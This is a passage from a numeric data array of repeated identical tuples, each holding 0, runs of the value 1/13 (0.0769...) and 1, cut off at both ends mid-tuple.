0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 